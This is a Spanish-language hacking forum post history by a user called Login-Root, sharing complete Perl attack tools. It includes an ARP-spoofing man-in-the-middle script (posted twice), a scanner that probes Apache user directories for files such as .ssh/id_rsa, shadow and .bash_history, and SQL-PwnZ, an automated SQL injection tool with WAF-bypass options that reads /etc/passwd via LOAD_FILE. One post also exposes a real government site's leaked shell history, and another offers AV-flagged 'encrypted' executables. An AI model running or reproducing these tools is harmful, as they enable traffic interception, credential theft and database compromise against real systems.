|
Mostrar Mensajes
|
Páginas: [1] 2 3
|
1
|
Seguridad Informática / Hacking / Re: Perl ARP-Spoofer v0.2
|
en: 4 Febrero 2011, 23:17 pm
|
Gracias a las ideas de averno saco la v0.2 v0.2:- IPTables forwarding añadido (gracias averno)
- Restauración de mac's originales y forwarding
- Mas info en ejecucion
Screenshot:
Wireshark dump:
Code:
#!/usr/bin/perl
# Perl ARP-Spoofer By Login-Root # Long life Camacho Tequila # 2011 shit # Run it as root
# Net::ARP & Net::Ping requerido use Net::ARP; use Net::Ping;
if ($< != 0) { print "\n[!] Run it as root\n\n"; exit(0); }
if(!$ARGV[2]) { print "\n###########################################"; print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #"; print "\n###########################################"; print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n"; exit(0); }
sub finaliza { print "\n\n[!] Restaurando cache ARP de host's remotos\n";
print "\n[+] $host1 is-at $mac1 (to $host2)"; Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply'); print "\n[+] $host2 is-at $mac2 (to $host1)"; Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');
print "\n\n[!] Deshabilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward"; print FORWD "0"; close(FORWD);
system("iptables -P FORWARD DROP");
print "\n[!] Saliendo...\n\n"; exit(0); }
($dev, $host1, $host2) = @ARGV;
print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";
$lmac = Net::ARP::get_mac($dev);
print "\n[!] MAC Local : $lmac";
my $ping = Net::Ping->new('icmp'); $ping->ping($host1, 2); $ping->ping($host2, 2);
$mac1 = Net::ARP::arp_lookup($dev,$host1); $mac2 = Net::ARP::arp_lookup($dev,$host2);
print "\n[!] MAC Host 1: $mac1"; print "\n[!] MAC Host 2: $mac2";
print "\n\n[!] Habilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward"; print FORWD "1"; close(FORWD);
# (thnx averno) system("iptables -P FORWARD ACCEPT");
print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";
while(1) { $SIG{INT} = \&finaliza; sleep(1); print "\n[+] $host1 is-at $lmac (to $host2)"; Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply'); print "\n[+] $host2 is-at $lmac (to $host1)"; Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply'); }
__END__
|
|
|
3
|
Seguridad Informática / Hacking / Perl ARP-Spoofer v0.2
|
en: 3 Febrero 2011, 08:48 am
|
Simple ARP-Spoofer escrito en Perl, recien salido del horno, espero que les guste / sirva v0.2:- IPTables forwarding añadido (gracias averno)
- Restauración de mac's originales y forwarding
- Mas info en ejecucion
Screenshot:
Wireshark dump:
Code:
#!/usr/bin/perl
# Perl ARP-Spoofer By Login-Root # Long life Camacho Tequila # 2011 shit # Run it as root
# Net::ARP & Net::Ping requerido use Net::ARP; use Net::Ping;
if ($< != 0) { print "\n[!] Run it as root\n\n"; exit(0); }
if(!$ARGV[2]) { print "\n###########################################"; print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #"; print "\n###########################################"; print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n"; exit(0); }
sub finaliza { print "\n\n[!] Restaurando cache ARP de host's remotos\n";
print "\n[+] $host1 is-at $mac1 (to $host2)"; Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply'); print "\n[+] $host2 is-at $mac2 (to $host1)"; Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');
print "\n\n[!] Deshabilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward"; print FORWD "0"; close(FORWD);
system("iptables -P FORWARD DROP");
print "\n[!] Saliendo...\n\n"; exit(0); }
($dev, $host1, $host2) = @ARGV;
print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";
$lmac = Net::ARP::get_mac($dev);
print "\n[!] MAC Local : $lmac";
my $ping = Net::Ping->new('icmp'); $ping->ping($host1, 2); $ping->ping($host2, 2);
$mac1 = Net::ARP::arp_lookup($dev,$host1); $mac2 = Net::ARP::arp_lookup($dev,$host2);
print "\n[!] MAC Host 1: $mac1"; print "\n[!] MAC Host 2: $mac2";
print "\n\n[!] Habilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward"; print FORWD "1"; close(FORWD);
# (thnx averno) system("iptables -P FORWARD ACCEPT");
print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";
while(1) { $SIG{INT} = \&finaliza; sleep(1); print "\n[+] $host1 is-at $lmac (to $host2)"; Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply'); print "\n[+] $host2 is-at $lmac (to $host1)"; Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply'); }
__END__
|
|
|
4
|
Seguridad Informática / Hacking / Re: [!] Apache Files Finder
|
en: 11 Octubre 2010, 18:26 pm
|
Dependiendo de la configuración del Apache, acceden al public_html o no. Y creeme que he encontrado archivos interesantes de esta forma, hay muchos usuarios que montan webs vulnerables o depositan archivos importantes en su public_html, creyendo que nadie se los puede leer, y bueno despues son vulnerados. Te dejo un ejemplo (que hace .bash_history ahi si es el public_html ¿¿??):http://sitl.diputados.gob.mx/.bash_historyContenido:pwd ls -la pwd ls cd recepcion_diputados ls cd cuestionario exit df -k top id su id su id ls clear df -k ls cd / ls cd var/ ls cd local/ ls ls find / -name htdocs su clear ls su printenv NLS_LANG=AMERICAN_AMERICA.WE8ISO8859P1 export NLS_LANG printenv su exit su su su exit date date su root exit pwd cls pwd pass (Lindo disclosure de comandos y directorios, genial para obtener información adicional)
|
|
|
5
|
Seguridad Informática / Hacking / [!] Apache Files Finder
|
en: 11 Octubre 2010, 01:58 am
|
Este script básicamente lo que realiza es buscar archivos/carpetas interesantes en las home`s de algun servidor que corra Apache (Y tenga la opción de acceso con ~, es decir, se permita acceder a http://www.website.com/~nombreusuario/). Para ello se necesitan de dos archivos de texto, el primero, con la lista de usuarios a probar (que podremos haber sacado por brute-force, mediante LFI, LOAD_FILE, etc.), y segundo, la lista con directorios a probar en cada uno de los home`s de cada usuario. Ejemplos:users.txtroot ftp mysql bin daemon ibsoc ifsca aminen dpisf idsum ieduc ivivi itcp sergio juan backup imosp publish gbrusa igobi iforo ispyc amoran mysqldump mesaadm sinrespuesta amgarcia mcabrera boletinoficial dsum improd patricia mauro agostina lucila hyperic nagios clamav dirs.txtindex.htm index.html index.php .bash_history .bashrc .ftpquota .gbent .grc .gui .host .hosts .jpilot .master .members .mysql_history .net .nsconfig .pass .passes .pwd .ssh/ .ssh/know_hosts .ssh/id_rsa .ssh/id_rsa.pub .ssh/id_rsa.priv .ssh/id_rsa.key host hosts passwd shadow Funcionamiento:Salida (results.html):Code:#!/usr/bin/perl use HTTP::Request; use LWP::UserAgent;
if(!$ARGV[3]) { print "\n\n#####################################"; print "\n# Apache Files Finder By Login-Root #"; print "\n#####################################"; print "\n\nUso: perl $0 [WEBSITE] [USERS LIST] [DIRECTORY LIST] [PATH TO SAVE (HTML)]"; print "\nEx : perl $0 http://www.website.com users.txt dirs.txt results.html\n\n"; exit(0); }
$ua = LWP::UserAgent->new; $ua->agent("Google Bot");
($web, $users, $dirs, $save) = @ARGV;
if ( $web !~ /^http:/ ) { $web = "http://" . $web; }
open USERS, $users; open SAVE, ">>$save";
print "\n[!] Scanning $web for files in users, saving in $save\n\n";
foreach $lista(<USERS>) { chomp($lista); open DIRS, $dirs; foreach $dir(<DIRS>) { chomp($dir); $host = $web.`/~`.$lista.`/`.$dir; $req = HTTP::Request->new(GET => "$host"); $res = $ua->request($req); $result = $res->code; if ($result != 404 and $result != 403) { print "\n".$res->status_line.": $host"; print SAVE $res->status_line.` : <a href="`.$host.`" TARGET="_new">`.$host.`</a><br>`; } } close(DIRS); }
print "\n"; close(USERS,SAVE);
__END__
|
|
|
7
|
Seguridad Informática / Nivel Web / SQL-PwnZ v1.5 [NEW] [Mix Collations & mod_security Bypass]
|
en: 6 Abril 2010, 09:11 am
|
Nuevo:- Agregado mod_security Bypass.
- Agregado Illegal Mix Of Collations Bypass.
- Agregadas más tablas para bruteforce.
- Agregadas más columnas para bruteforce.
- Código interno mejorado.
- Bugs Fixeados.
Sitio con mod_security activado:
SQL-PwnZ: Bypasseando
Salida:
Sitio con Illegal Mix Of Collations:
SQL-PwnZ: Bypasseando
Salida:
Código:
#!/usr/bin/perl
################################################################################################################## # -[+]- SQL-PwnZ v1.5 | By Login-Root -[+]- ### ##################################################################################################################
################################################################################################################## # [+] inf0: ### ################################################################################################################## # Busca: ### # ====== ### # - Nº de columnas ### # - Information_Schema && MySQL.User ### # - LOAD_FILE ### # - Tablas ### # - Columnas ### # - Illegal Mix Of Collations Bypass && mod_security Bypass ### # ### # ...y guarda todo en un archivo de texto. ### # ### ##################################################################################################################
################################################################################################################## # [+] Use: ### ################################################################################################################## # perl sqlpwnz.pl [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS] ### # [WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO] ### # [COLUMNAS]: Limite de columnas ### # [ARCHIVO]: Archivo donde guardar web vulnerable ### # [COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional) ### # [-TB]: Intentar brutear tablas (Opcional) ### # [-CL]: Intentar brutear columnas (Opcional) ### # [-NOCHECK]: No hacer el chequeo inicial (Opcional) ### # [-MOD_FUCK]: Activar mod_security Bypass (Opcional) ### # [-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional) ### ##################################################################################################################
################################################################################################################## # [+] c0ntact: ### ################################################################################################################## # MSN: no.more@passport.com ### # E-Mail: login_root@yahoo.com.ar ### ##################################################################################################################
################################################################################################################## # [+] sh0utz: ### ################################################################################################################## # Greetz: KiKo ; VanHan ; [Dead] Knet ; Ricota ; InyeXion ; OxOnO ; Matt ; r0dr1 ; oceanik6 ; OzX ; yoyahack ### # VISIT: WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM ### ##################################################################################################################
use HTTP::Request; use LWP::UserAgent;
if(!$ARGV[2]) { print "\n\n-[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-\n========================================="; print "\n\nUso: perl $0 [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS]\n"; print "\n[WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]\n[COLUMNAS]: Limite de columnas\n[ARCHIVO]: Archivo donde guardar web vulnerable\n[COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)\n[-TB]: Intentar brutear tablas (Opcional)\n[-CL]: Intentar brutear columnas (Opcional)\n[-NOCHECK]: No hacer el chequeo inicial (Opcional)\n[-MOD_FUCK]: Activar mod_security Bypass (Opcional)\n[-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)\n\n"; exit (0); } @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users', 'name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios', 'miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores', 'administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user', 'user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name', 'member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre', 'user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio', 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head', 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users', 'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente', 'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes', 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos', 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','web_users','curso', 'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead', 'associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users', 'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users','tb_usuarios', 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','tb_usuario', 'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha', 'username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente', 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario', 'login_id','usr','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username', 'sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave', 'membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password', 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors', 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
($host, $columnas, $savelist) = @ARGV;
$agent = LWP::UserAgent->new; $agent->agent("Google Bot");
if ( $host !~ /^http:/ ) { $host = "http://" . $host; }
for ($numarg = 0 ; $numarg <= $#ARGV ; $numarg++) { $argumentos.= $ARGV[$numarg]; }
if ($argumentos =~ /-MIX_BYPASS/i) { print "\n[+] MIX_BYPASS ACTIVADO"; $hexin = "unhex(hex("; $hexend = "))"; } if ($argumentos !~ /-MOD_FUCK/i) { if ($argumentos =~ /--/) { $cmn= "+"; $cfin="--"; print "\n[+] Comentarios a utilizar: '--' & '+'"; } else { $cmn= "/**/"; $cfin= "/*"; print "\n[+] Comentarios a utilizar: '/*' & '/**/'"; } } else { print "\n[+] MOD_FUCK ACTIVADO, se ignoran comentarios. Utilizando: '+'. Bypass: '/*!' & '*/'"; $bypass = "+/*!"; $cmn= "+"; $cfin= "*/"; }
open(WEB,">>".$savelist) || die "\n\n[-] Imposible crear el archivo de texto\n"; if ($argumentos =~ /-NOCHECK/i) { print "\n[!] Se omite el chequeo inicial...\n"; print WEB "[WEBSITE]:\n\n$host\n"; } else { print "\n[!] Chequeando si la web es vulnerable...\n"; $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cfin)); $response = $sql->content(); if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /error de sintaxis al final de la entrada/ || $response =~ /Unknown column/) { print "[+] Web vulnerable, continua el script...\n"; print WEB "[WEBSITE]:\n\n$host\n"; } else { print "[-] Website aparentemente no vulnerable a SQL Inyection, intentar con otro comentario o con -NOCHECK activado\n\n"; close(WEB); exit(0); } } print "\n[!] Buscando columnas...\n"; for ($column = 1 ; $column <= $columnas ; $column ++) { $UNION.=','.$column; $inyection.=','."0x6c6f67696e70776e7a"; if ($column == 1) { print WEB "\n[COLUMNAS]:\n\n"; $inyection = ''; $UNION = ''; } $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin)); $response = $sql->content(); if($response =~ /loginpwnz/) { print "[+] La web posee $column columnas\n\n"; $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cfin; print "$sql\n"; print WEB "$sql\n"; print "\n[!] Chequeando si existe Information_Schema..."; $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."information_schema.tables".$cfin)); $response = $sql->content(); if($response =~ /loginpwnz/) { print "\n[+] Information_Schema disponible...guardando en $savelist"; $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."information_schema.tables".$cfin; print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n"; } else { print "\n[-] Information_Schema no disponible"; } print "\n[!] Chequeando si existe MySQL.User..."; $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."mysql.user".$cfin)); $response = $sql->content(); if($response =~ /loginpwnz/) { print "\n[+] MySQL.User disponible...guardando en $savelist"; $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."mysql.user".$cfin; print WEB "\n\n[MYSQL.USER]:\n\n$sql\n"; } else { print "\n[-] MySQL.User no disponible"; } while ($loadcont < $column-1) { $loadfile.=','.$hexin.'LOAD_FILE(0x2f6574632f706173737764)'.$hexend; $loadcont++; } print "\n[!] Chequeando si es posible inyectar LOAD_FILE..."; $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."LOAD_FILE(0x2f6574632f706173737764)".$hexend.$loadfile.$cfin)); $response = $sql->content(); if($response =~ /root:x:/) { print "\n[+] LOAD_FILE disponible...guardando en $savelist"; print WEB "\n\n[LOAD_FILE]:\n\n$hexinLOAD_FILE(0x2f6574632f706173737764)$hexend => OK! (0x2f6574632f706173737764 => /etc/passwd)\n"; } else { print "\n[-] LOAD_FILE no disponible"; } if ($argumentos =~ /-TB/i) { print "\n\n[!] Bruteando tablas..."; print WEB "\n\n[TABLAS]:\n\n"; foreach $tabla(@nombretabla) { chomp($tabla); $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn.$tabla.$cfin)); $response = $sql->content(); if($response =~ /loginpwnz/) { print "\n[+] La tabla $tabla esta disponible...guardando en $savelist"; $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn.$tabla.$cfin; print WEB "$sql\n"; } } } if ($argumentos =~ /-CL/i) { print "\n\n[!] Tabla a la cual brutear columnas: "; $tabla=<STDIN>; chomp($tabla); print WEB "\n\n[COLUMNAS EN $tabla]:\n\n"; foreach $columna(@nombrecolumna) { chomp($columna); $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$hexend.$inyection.$cmn."FROM".$cmn.$tabla.$cfin)); $response = $sql->content(); if ($response =~ /loginpwnz/) { print "\n[+] La columna $columna esta disponible...guardando en $savelist"; print WEB "$hexin$columna$hexend\n"; } } } print WEB "\n\n\n[*EOF*]"; print "\n\n[+] Todo salvado correctamente en $savelist\n\n"; print "## c0ded by Login-Root | 2010 ##\n\n"; close(WEB); exit (0); } } print "[-] Imposible encontrar numero de columnas, intentar con mas columnas\n\n"; print "## c0ded by Login-Root | 2010 ##\n\n"; close(WEB); exit (0); Sitio:http://sourceforge.net/projects/sqlpwnz/
|
|
|
9
|
Seguridad Informática / Hacking / Shell-Run | IPFilter - By VanHan
|
en: 11 Febrero 2010, 03:14 am
|
Aca les dejo dos programitas que hizo un amigo mio, VanHan, cuando fui a la casa y le pedi que me los programara (si, soy un vago terrible ) Shell-Run:Un simple launcher, lo uso para cuando estoy en Windows y quiero ejecutar codes (python, perl, etc), rapidamente. Ponen el comando (python, perl, el que quieran), el lugar del archivo, abajo los argumentos y listo. Si quieren lo pueden minimizar a la tray y dejarlo corriendo en segundo plano: Download (Multiple mirrors):http://massmirror.com/16b7214f1832d3682193b0b86d3a45db.html:-------------------------------------------------------------:IPFilter:Este es mas completito, sirve para filtrar los numeros, fechas, puntos, etc de los siguientes servidores de Reverse IP: Vamos por ejemplo, a usar la primera, http://www.ip-adress.com/reverse_ipPonemos la IP o el dominio y damos a Enter. Copiamos todos los dominios de esa respectiva IP. Los pegamos en el programa (Fijense que este bien seleccionado www.ip-adress.com) y le damos a filtrar. Listo! Filtrados. Dando click a Guardar guarda el texto filtrado en el archivo "Ips.txt". Download (Multiple mirrors): http://massmirror.com/675283888b9ba458430631f4564a5fe3.htmlAh, me olvidaba...antes que me digan: LOGIN-ROOT ESTO ESTA TROYANIZADO !, les digo que NO, solo estan cifrados, por eso les salta el AV. Ejecutenlo en una PC Virtual, sniffen las conexiones con Wireshark, hagan lo que quieran. Los codes estan 100% limpios.Saludos.
|
|
|
|
|
|
|